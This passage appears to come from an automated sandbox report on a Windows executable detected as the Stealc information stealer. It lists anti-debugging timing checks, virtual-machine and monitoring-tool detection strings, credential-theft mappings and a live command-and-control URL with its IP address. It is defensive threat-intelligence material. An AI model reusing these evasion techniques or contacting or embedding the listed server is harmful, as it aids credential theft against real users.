                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57168E second address: 5716A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007F3D90F37F1Fh 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5732A3 second address: 5732A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5730FB second address: 573123 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F3D90F37F27h 0x0000000f push edi 0x00000010 pop edi 0x00000011 jmp 00007F3D90F37F1Fh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57C5D8 second address: 57C5DF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57C5DF second address: 57C610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F3D90F37F20h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007F3D90F37F22h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57C610 second address: 57C616 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57C616 second address: 57C61C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CFE5 second address: 58CFFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90D93B52h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CFFB second address: 58D001 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D001 second address: 58D045 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3D90D93B57h 0x00000008 jmp 00007F3D90D93B53h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jp 00007F3D90D93B4Ch 0x00000016 pushad 0x00000017 jnl 00007F3D90D93B46h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CD6B second address: 58CD71 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BD86 second address: 59BDA1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F3D90D93B52h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CA85 second address: 59CA89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CBCA second address: 59CC01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3D90D93B46h 0x0000000a ja 00007F3D90D93B52h 0x00000010 push edx 0x00000011 jmp 00007F3D90D93B58h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E4D8 second address: 59E4E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F3D90F37F18h 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59E4E9 second address: 59E4FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B4Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A0F44 second address: 5A0F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A1440 second address: 5A146C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F3D90D93B4Dh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A146C second address: 5A1470 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A1470 second address: 5A14AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3D90D93B4Bh 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007F3D90D93B59h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push ecx 0x00000018 js 00007F3D90D93B4Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A44FC second address: 5A4518 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F3D90F37F18h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A4518 second address: 5A4539 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3D90D93B59h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A4539 second address: 5A453D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A617B second address: 5A6188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F3D90D93B46h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A6188 second address: 5A618C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A618C second address: 5A6192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A6192 second address: 5A61B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3D90F37F29h 0x00000009 js 00007F3D90F37F16h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC043B second address: 4FC044A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC044A second address: 4FC04DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90F37F29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F3D90F37F1Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F3D90F37F21h 0x00000017 and cx, 2D36h 0x0000001c jmp 00007F3D90F37F21h 0x00000021 popfd 0x00000022 mov ax, 4927h 0x00000026 popad 0x00000027 xchg eax, ebp 0x00000028 pushad 0x00000029 jmp 00007F3D90F37F28h 0x0000002e mov edi, ecx 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F3D90F37F23h 0x0000003a rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 30DD40 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 53ED53 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-37411
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000340F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_000340F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0002E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0002E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00021710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00021710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0002F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0002F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000347C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_000347C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00033B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00033B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00034B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00034B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0002DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0002DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0002EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0002EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0002BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0002BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0002DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0002DF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00021160 GetSystemInfo,ExitProcess,0_2_00021160
                Source: file.exe, file.exe, 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1800359502.0000000001032000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWn
                Source: file.exe, 00000000.00000002.1800359502.0000000001032000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareQ
                Source: file.exe, 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.1800359502.0000000001004000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36224
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36227
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36246
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36238
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36278
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36111
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00024610 VirtualProtect ?,00000004,00000100,000000000_2_00024610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00039BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00039BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00039AA0 mov eax, dword ptr fs:[00000030h]0_2_00039AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00037690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_00037690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4600, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00039790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00039790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000398E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_000398E0
                Source: file.exe, file.exe, 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: gProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00067588 cpuid 0_2_00067588
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00037D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00037B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00037B10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000379E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_000379E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00037BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00037BC0

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.20000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1756543501.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4600, type: MEMORYSTR
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.20000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1756543501.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4600, type: MEMORYSTR
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem334
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/6c4adf523b719729.phptrue
                  		unknown
                  http://185.215.113.206/true
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206file.exe, 00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.206/6c4adf523b719729.phpa-file.exe, 00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://docs.rs/getrandom#nodejs-es-module-supportfile.exe, file.exe, 00000000.00000003.1756543501.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpfalse
                        • URL Reputation: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        185.215.113.206
                        		unknownPortugal
                        		206894WHOLESALECONNECTIONSNLtrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1545720
                        Start date and time:2024-10-30 21:54:08 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 3m 15s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:1
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@1/0@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 80%
                        • Number of executed functions: 19
                        • Number of non-executed functions: 129
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated

                        Warnings

                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: file.exe

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        185.215.113.206file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/6c4adf523b719729.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.206/6c4adf523b719729.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/6c4adf523b719729.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.206/6c4adf523b719729.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/6c4adf523b719729.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.206/6c4adf523b719729.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/6c4adf523b719729.php
                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                        • 185.215.113.206/6c4adf523b719729.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.206/6c4adf523b719729.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206/6c4adf523b719729.php

                        Domains

                        No context

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                        • 185.215.113.16
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.206
                        Setup.exeGet hashmaliciousRedLineBrowse
                        • 185.215.113.22
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.206
                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                        • 185.215.113.206

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        No created / dropped files found

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.959339572334429
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.exe
                        File size:2'146'304 bytes
                        MD5:e7e67024404f23389e4052996e08923a
                        SHA1:7b695a106607d413d657ba1ca50401b03df2fafd
                        SHA256:114e599411e6fa14e2231d45e8ad7ccfffcb068cebe1c93ee98094c8a744cecb
                        SHA512:ac4a0a2cbeb489e1ab346a79cce1b055dc9387ef20b7c5a3806dd75b00a8558fc199e8ef652b00e63cdb28b7e5c2247100d9112667aeaa69510451409af4158d
